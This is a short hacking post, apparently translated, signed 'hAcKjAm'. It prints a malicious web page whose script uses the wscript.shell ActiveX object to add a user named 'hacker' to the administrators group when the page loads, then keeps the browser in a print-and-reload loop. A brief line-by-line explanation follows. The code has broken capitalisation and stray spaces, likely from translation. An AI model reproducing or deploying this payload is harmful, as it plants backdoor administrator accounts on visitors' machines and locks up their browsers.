BY hAcKjAm
First, let's look at the Code:
<Html>
<Title> cnhackerx@163.com </title>
<Head>
<Script type = "text/javascript">
Function sucks ()
{
Var shell = new ActiveXObject ("wscript. shell ");
Shell. Run ("net user hacker/add & net localgroup administrators hacker/add", 1 );
}
Function asheesh ()
{
Sucks ();
Window. onerror = new Function ("history. go (0 )");
Window. print ();
Asheesh ();
}
Asheesh ();
</Script>
</Head>
<Body onLoad = "asheesh ()"> </body>
</Html>
Key:
Var shell = new ActiveXObject ("wscript. shell ");
Shell. Run ("net user hacker/add & net localgroup administrators hacker/add", 1 );
// Register wscript. shell as ActiveX, and wscript. shell as the code for running the program in VBS.
Shell. Run ("net user hacker/add & net localgroup administrators hacker/add", 1 );
// Call this ActiveX, that is, wscript. shell, run the "net user hacker/add & net localgroup administrators hacker/add" doscommand. This command adds a account named hacker, the account whose password is hacker is upgraded to the Administrator group.